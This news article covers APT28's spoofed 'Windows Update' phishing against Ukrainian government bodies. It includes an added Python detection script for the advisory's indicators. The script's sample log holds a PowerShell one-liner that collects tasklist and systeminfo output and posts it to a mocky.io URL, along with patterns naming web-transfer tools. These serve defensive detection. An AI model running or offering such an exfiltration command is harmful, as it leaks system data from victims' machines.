APT28 Targets Ukrainian Government Entities with Spoofed “Windows Update” Emails.

May 01, 2023 | Ravie Lakshmanan | Threat Analysis / Cyber Attacks

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a cyber attack by Russian nation-state hackers targeting various government agencies in the country.

The agency attributed the phishing campaign to APT28, also known as Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy.

The email message came with the subject line “Windows Update” and purportedly contained instructions in Ukrainian to run PowerShell commands under the pretense of a security update.

Executing the script loads and runs a next-stage PowerShell script designed to gather basic system information via commands such as tasklist and systeminfo, and to exfiltrate the collected details via an HTTP request to a Mocky API.


To trick the target into executing the command, the email impersonates the system administrator of the targeted government entity using a fake Microsoft Outlook email account created with an employee’s real name and initials.

CERT-UA recommends that organizations limit users’ ability to run PowerShell scripts and monitor network connections to the Mocky API.
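The two detection opportunities in the paragraphs above (PowerShell that runs host-discovery commands and then makes a web request, and outbound connections to the Mocky API) can be expressed as a small log-scanning pass. The code below is an added example, not part of CERT-UA's advisory or this article. The log formats, hostnames, user names and the request path are constructed for illustration; in particular, the assumption that the Mocky service answers under a `mocky.io` hostname is mine, since the article only names "Mocky API".

```python
"""Toy detection pass for the two indicators described above: PowerShell that
runs host-discovery commands and ships the output over HTTP, and network
connections to the Mocky API. All log lines below are constructed samples;
the *.mocky.io hostname pattern is an assumption about that service."""
import re
from dataclasses import dataclass

# Constructed sample of PowerShell script-block logging (Event ID 4104 style),
# one record per line: "timestamp|host|user|script_text".
SCRIPT_BLOCK_LOG = """\
2023-04-28T09:12:01Z|WS-0412|gov\\o.shevchenko|Get-ChildItem C:\\Reports | Measure-Object
2023-04-28T09:14:33Z|WS-0412|gov\\o.shevchenko|$d = (tasklist; systeminfo) -join "`n"; Invoke-RestMethod -Uri https://run.mocky.io/v3/placeholder -Method Post -Body $d
2023-04-28T09:20:10Z|WS-0077|gov\\admin.backup|Get-Service | Where-Object Status -eq Running
"""

# Constructed sample of web proxy log lines:
# "timestamp src_ip method host path status".
PROXY_LOG = """\
2023-04-28T09:14:34Z 10.20.4.12 POST run.mocky.io /v3/placeholder 200
2023-04-28T09:15:02Z 10.20.4.12 GET www.microsoft.com /en-us/ 200
2023-04-28T09:16:45Z 10.20.7.31 GET update.microsoft.com /v6/ 304
"""

# Built-in discovery commands named in the advisory (tasklist, systeminfo) plus
# a couple of equally common ones.
DISCOVERY_CMDS = re.compile(r"\b(tasklist|systeminfo|whoami|ipconfig)\b", re.IGNORECASE)
# Ways a PowerShell one-liner typically sends data out over HTTP.
WEB_CMDS = re.compile(
    r"(Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|Net\.WebClient|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
# Assumed hostname pattern for the Mocky API (mocky.io and any subdomain).
MOCKY_HOST = re.compile(r"(^|\.)mocky\.io$", re.IGNORECASE)


@dataclass
class Finding:
    source: str   # which log produced the hit
    host: str     # workstation name or source IP
    reason: str   # human-readable explanation


def scan_script_blocks(log_text: str) -> list[Finding]:
    """Flag script blocks that combine discovery commands with a web request."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        # Split on the first three pipes only: the script text may itself contain '|'.
        ts, host, user, script = line.split("|", 3)
        discovered = sorted({m.lower() for m in DISCOVERY_CMDS.findall(script)})
        if discovered and WEB_CMDS.search(script):
            findings.append(Finding(
                "script_block", host,
                f"discovery {discovered} followed by web request ({user} @ {ts})"))
    return findings


def scan_proxy(log_text: str) -> list[Finding]:
    """Flag any outbound request whose destination host is the Mocky API."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, method, fqdn, path, status = line.split()
        if MOCKY_HOST.search(fqdn):
            findings.append(Finding(
                "proxy", src, f"{method} to Mocky API host {fqdn}{path} ({ts})"))
    return findings


def run_detections(script_log: str = SCRIPT_BLOCK_LOG,
                   proxy_log: str = PROXY_LOG) -> list[Finding]:
    """Run both scans and return all findings in order (script blocks first)."""
    return scan_script_blocks(script_log) + scan_proxy(proxy_log)


if __name__ == "__main__":
    for f in run_detections():
        print(f"[{f.source}] {f.host}: {f.reason}")
```

On the constructed input the script-block scan fires once (the record that runs tasklist and systeminfo and posts the result) and the proxy scan fires once (the POST to the mocky.io host); the benign administrative script blocks and the Microsoft update traffic produce nothing. Correlating the two hits by time and by the workstation's IP is the natural next step in a real SIEM, but the two independent signals already cover the advisory's two recommendations.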

The disclosure comes weeks after APT28 was linked to an attack that exploited a now-patched security flaw in network equipment to perform reconnaissance and spread malware against specific targets.

The Google Threat Analysis Group (TAG), in an advisory published last month, detailed a credential harvesting operation carried out by threat actors to redirect visitors to Ukrainian government websites to phishing domains.

Russia-based hacking crews have also been linked to exploiting a critical privilege escalation flaw in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) in intrusions directed against the government, transport, energy, and military sectors in Europe.


The development also comes as Fortinet FortiGuard Labs uncovered a multi-stage phishing attack that leveraged a purported macro-laced Word document from Energoatom Ukraine as a lure to deliver the open source Havoc post-exploitation framework.

“It is highly likely that the Russian intelligence, military and law enforcement services have a long-standing tacit understanding with the perpetrators of cybercrime threats,” cybersecurity firm Recorded Future said in a report earlier this year.

“In some cases, it is almost certain that these agencies maintain an established and systematic relationship with cybercrime threat actors, either through indirect collaboration or through recruitment.”
